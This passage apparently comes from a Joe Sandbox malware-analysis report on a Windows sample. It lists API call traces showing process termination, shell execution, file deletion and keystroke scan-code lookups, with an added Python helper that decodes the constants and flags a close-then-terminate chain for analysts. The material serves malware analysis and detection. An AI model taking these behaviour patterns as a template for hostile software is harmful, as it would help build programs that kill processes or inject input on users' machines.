• Instruction Fuzzy Hash: F1016CB09017597DE3009F5A8C85B52FFB8FF19354F00411B915C47941C7F5A864CBE5

APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B4F447
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B4F45D
• GetWindowThreadProcessId.USER32(?,?), ref: 00B4F46C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B4F47B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B4F485
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B4F48C
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 21325abca50649bc86cfcbe2e75dbd6703bb2618159a832011d544e2aa0de56f
• Instruction ID: bdcb7f5af03f0986460fe81e2dcb0587eec240cb8be383e6045d5254e9131936
• Opcode Fuzzy Hash: 21325abca50649bc86cfcbe2e75dbd6703bb2618159a832011d544e2aa0de56f
• Instruction Fuzzy Hash: 66F03032241158BBE72157629C0EEEF3B7CEFC6B51F000058F60AA2190DBA05A81D6B5
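Decoding the literal arguments in the entry above (and in the MapVirtualKeyW entry earlier on this page) shows what these routines do. Message 0x10 is WM_CLOSE: it is posted, then sent again with SMTO_ABORTIFHUNG (0x2) and a 500 ms (0x1F4) timeout, after which the window's owning process is looked up, opened with 0x1F0FFF (PROCESS_ALL_ACCESS) and terminated. The MapVirtualKeyW calls map the modifier keys VK_LWIN (0x5B), VK_SHIFT (0x10), VK_LSHIFT (0xA0), VK_RSHIFT (0xA1), VK_CONTROL (0x11) and VK_MENU (0x12) to scan codes (MAPVK_VK_TO_VSC = 0), the lookup a program performs before synthesizing keystrokes. The Python helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses trace lines in the format the report prints, names the constants from the Windows SDK headers, and flags the close-then-terminate subsequence so an analyst can locate that routine quickly in a long function list. The trace lines embedded in it are copied from this page; the regular expression, the constant table and the chain definition are this example's own, and the `?` placeholders are the sandbox's own marker for argument values it did not recover.

```python
"""Decode and triage Joe Sandbox 'APIs' trace lines (added example, not part of the report)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed input: trace lines from two entries of this report, copied as printed
# (call sites 00AE32AF.. and 00B4F447..), so the helper runs offline.
SAMPLE_TRACE = """
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AE32AF
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00AE32B7
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B4F447
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B4F45D
• GetWindowThreadProcessId.USER32(?,?), ref: 00B4F46C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B4F47B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B4F485
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B4F48C
"""

# One report line: optional bullet, Api.MODULE(args), ref: call-site address.
LINE_RE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Symbolic names for literals seen in the trace, keyed by (API, zero-based argument index).
# Values come from the Windows SDK headers. 0x1F0FFF is PROCESS_ALL_ACCESS as defined for
# targets below Windows Vista; SDKs targeting Vista or later define it as 0x1FFFFF.
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x1328: "TCM_ADJUSTRECT"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
                0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
ARG_NAMES = {
    ("PostMessageW", 1): WINDOW_MESSAGES,
    ("SendMessageW", 1): WINDOW_MESSAGES,
    ("SendMessageTimeoutW", 1): WINDOW_MESSAGES,
    ("SendMessageTimeoutW", 4): {0x0002: "SMTO_ABORTIFHUNG"},
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},
    ("MapVirtualKeyW", 0): VIRTUAL_KEYS,
    ("MapVirtualKeyW", 1): {0x0000: "MAPVK_VK_TO_VSC"},
    ("GetSysColor", 0): {0x0005: "COLOR_WINDOW"},
}


@dataclass
class Call:
    api: str
    module: str
    args: list[int | None]  # None where the sandbox printed '?' (value not recovered)
    ref: int                # address of the call site

    def decoded(self) -> list[str]:
        """Render each argument as hex, with its SDK name where one is known."""
        out = []
        for i, a in enumerate(self.args):
            if a is None:
                out.append("?")
                continue
            name = ARG_NAMES.get((self.api, i), {}).get(a)
            out.append(f"0x{a:X}" + (f" ({name})" if name else ""))
        return out


def parse_trace(text: str) -> list[Call]:
    """Parse the report's bullet lines into Call records, ordered by call-site address."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [None if t.strip() == "?" else int(t, 16)
                for t in m["args"].split(",") if t.strip()]
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16)))
    return sorted(calls, key=lambda c: c.ref)


# Post WM_CLOSE, look up the window's owner, open it, terminate it: the sequence the
# report shows at 00B4F447..00B4F485. Order matters, so this is a subsequence match.
FORCED_CLOSE_CHAIN = ("PostMessageW", "GetWindowThreadProcessId", "OpenProcess", "TerminateProcess")


def has_forced_close_chain(calls: list[Call]) -> bool:
    pos = 0
    for c in calls:
        want = FORCED_CLOSE_CHAIN[pos]
        if c.api != want:
            continue
        if want == "PostMessageW" and not (len(c.args) > 1 and c.args[1] == 0x10):
            continue  # a PostMessageW that is not WM_CLOSE does not start the chain
        pos += 1
        if pos == len(FORCED_CLOSE_CHAIN):
            return True
    return False


def by_api(calls: list[Call], api: str) -> Call:
    """First call to `api` in the list; raises StopIteration if absent."""
    return next(c for c in calls if c.api == api)


if __name__ == "__main__":
    trace = parse_trace(SAMPLE_TRACE)
    for c in trace:
        print(f"{c.ref:08X} {c.api}.{c.module}({', '.join(c.decoded())})")
    print("forced-close chain:", has_forced_close_chain(trace))
```

The chain check is an ordered subsequence match rather than an exact list, so a CloseHandle, a logging call or the intermediate SendMessageTimeoutW between the steps does not hide the pattern; ARG_NAMES can be extended as further constants on the page are decoded.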

APIs
• GetClientRect.USER32(?), ref: 00B234EF
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00B23506
• GetWindowDC.USER32(?), ref: 00B23512
• GetPixel.GDI32(00000000,?,?), ref: 00B23521
• ReleaseDC.USER32(?,00000000), ref: 00B23533
• GetSysColor.USER32(00000005), ref: 00B2354D
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ClientColorMessagePixelRectReleaseSendWindow
• String ID:
• API String ID: 272304278-0
• Opcode ID: 21b77edc3c28cde26bffc704d019ebfc7e57b75541f0a39fd3dbc9b37b44d936
• Instruction ID: 467caf431a5f736864f838ad9a1609a2f746e566dc14ee549327685fccda1b16
• Opcode Fuzzy Hash: 21b77edc3c28cde26bffc704d019ebfc7e57b75541f0a39fd3dbc9b37b44d936
• Instruction Fuzzy Hash: A9011231500215EFDB505FA4EC09BAA7BF5FF18761F500260FA1EA31A0CF321E91AB10

APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B421CC
• UnloadUserProfile.USERENV(?,?), ref: 00B421D8
• CloseHandle.KERNEL32(?), ref: 00B421E1
• CloseHandle.KERNEL32(?), ref: 00B421E9
• GetProcessHeap.KERNEL32(00000000,?), ref: 00B421F2
• HeapFree.KERNEL32(00000000), ref: 00B421F9
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 2b5a2947f4b3e3bbdf35537cc7dfec5e909e63dc400fafab70b52c1d57f82ac5
• Instruction ID: 6b0b4d792cc2b945106ad2f32c496b571e331ba2301f300293f503618a47a9d3
• Opcode Fuzzy Hash: 2b5a2947f4b3e3bbdf35537cc7dfec5e909e63dc400fafab70b52c1d57f82ac5
• Instruction Fuzzy Hash: B4E0E576004105BBDB011FA1EC0C90ABF39FF493A2B504220F22A97870CF3294A0DB50

APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE41EA: _wcslen.LIBCMT ref: 00AE41EF
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B4CF99
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4CFE0
                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B4D047
                                                                                                                                                                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B4D075
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: a4157170ba9f739718cbcdab6c9d2bf659c7e6aff6afc7dc8e109954623495ff
                                                                                                                                                                                                                                                                                    • Instruction ID: af4f873df1d767fe661797a77e9a89d4fc5ad71e29ae145d17c448943149abab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4157170ba9f739718cbcdab6c9d2bf659c7e6aff6afc7dc8e109954623495ff
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB5110316043009BD724AF28C894B7BBBE8EF55714F040AADF995D32E0DBB4CE49A752
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00B6B903
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE41EA: _wcslen.LIBCMT ref: 00AE41EF
                                                                                                                                                                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00B6B998
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6B9C7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                    • String ID: <$@
                                                                                                                                                                                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                    • Opcode ID: 58892834bef2fdcd1b844e7331dfebbc8565ad83f88a691a46b9eb0b9691768a
                                                                                                                                                                                                                                                                                    • Instruction ID: b99e465a399b9578a52c9a0189850fae06ff0fae471428aac07408ddd7ffb798
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58892834bef2fdcd1b844e7331dfebbc8565ad83f88a691a46b9eb0b9691768a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8715875A00255DFCB10EF95C594A9EBBF4FF08310F048499E85AAB392CB79ED85CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B47B6D
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B47BA3
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B47BB4
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B47C36
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                    • Opcode ID: 4f906c9ad03036e5b4dde6511819ed0b6b4b5250fc28753c481d267a4d39db42
                                                                                                                                                                                                                                                                                    • Instruction ID: 67f03ba3b3d36566946d6e6469d8f79c4e2b009f214634909a9ca692ce910d12
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f906c9ad03036e5b4dde6511819ed0b6b4b5250fc28753c481d267a4d39db42
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A4191B1648204EFDB15DF64D8C4A9A7BF9EF44310F1480E9A909AF206DBB0DE44DBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B748D1
                                                                                                                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00B748E6
                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B7492E
                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00B74941
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
• Opcode ID: adae94a948b95f4686d09886b0b2fd5d3fafd5b1bd8c32dda9c7f07752c68bda
• Instruction ID: 42951a00ec1d188ea32685ccebab9132bd144ba02429ab6b8468926c1850bec6
• Opcode Fuzzy Hash: adae94a948b95f4686d09886b0b2fd5d3fafd5b1bd8c32dda9c7f07752c68bda
• Instruction Fuzzy Hash: D8415B75A00209EFDB10CF95D884EABBBF9FF06365F0481A9EA6997250D730ED44CB60
APIs
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
  • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B427B3
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B427C6
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00B427F6
  • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
• Opcode ID: f7f8df8533b25b1530c312adc0cb09b88cf837b2f6a983423040220a66a76c2d
• Instruction ID: 523d5b65c1e228c13a46a19689ab165241ab9b6b83d76b306f42cc411468c1bc
• Opcode Fuzzy Hash: f7f8df8533b25b1530c312adc0cb09b88cf837b2f6a983423040220a66a76c2d
• Instruction Fuzzy Hash: 4D21F171900104BEDB09ABA4DC8ADFFBBF8DF453A0B504169F425A71E1DF394E0AA660
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B73A29
• LoadLibraryW.KERNEL32(?), ref: 00B73A30
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B73A45
• DestroyWindow.USER32(?), ref: 00B73A4D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
• Opcode ID: 49a7cbe833e16a25638f8e46f06ea191c85b1b377ab0dc8ef1c2faa6c574e5e8
• Instruction ID: 89617cb17898cb3b13848ec6cf1aa485667944f04c63f679de5977f4ba4182c9
• Opcode Fuzzy Hash: 49a7cbe833e16a25638f8e46f06ea191c85b1b377ab0dc8ef1c2faa6c574e5e8
• Instruction Fuzzy Hash: 1521CD71600205AFEB108F64DC81EAF37E9EF44B64F109258FAA9920E0C771CD80AB60
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B0508E,?,?,00B0502E,?,00BA98D8,0000000C,00B05185,?,00000002), ref: 00B050FD
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B05110
• FreeLibrary.KERNEL32(00000000,?,?,?,00B0508E,?,?,00B0502E,?,00BA98D8,0000000C,00B05185,?,00000002,00000000), ref: 00B05133
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: fe89030d2f9f9b5edaa70f96b0a16e7cf60c7eb8c94572b5deaa777518b3240e
• Instruction ID: 7f06700cedf287d63c8ede234e95e6c4d8cec82d3c52a79e0092494d50ee6e17
• Opcode Fuzzy Hash: fe89030d2f9f9b5edaa70f96b0a16e7cf60c7eb8c94572b5deaa777518b3240e
• Instruction Fuzzy Hash: 78F04474901208BBDB115F94DC49BAEBFF8EF44752F4400A8F809B25A0DF745D91CB95
APIs
• LoadLibraryA.KERNEL32 ref: 00B3E785
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B3E797
• FreeLibrary.KERNEL32(00000000), ref: 00B3E7BD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 145871493-2590602151
• Opcode ID: 0c1d89a7004ffbb42ca4e6445214465c958f5db08b59331fc0722cdc79bf1efa
• Instruction ID: 3696dc139a592004eeac73ad46e58cf6c83a9edc0f1dd1dc888d120d99dcd00b
• Opcode Fuzzy Hash: 0c1d89a7004ffbb42ca4e6445214465c958f5db08b59331fc0722cdc79bf1efa
• Instruction Fuzzy Hash: 38E0E5719056149FE73157208C84FA932B4AF21741F2401EAF915F35A0DF30CC80C654
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B25657,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE6610
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AE6622
• FreeLibrary.KERNEL32(00000000,?,?,00B25657,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE6635
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B535C4
• DeleteFileW.KERNEL32(?), ref: 00B53646
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B5365C
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B5366D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B5367F
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: File$Delete$Copy
• String ID:
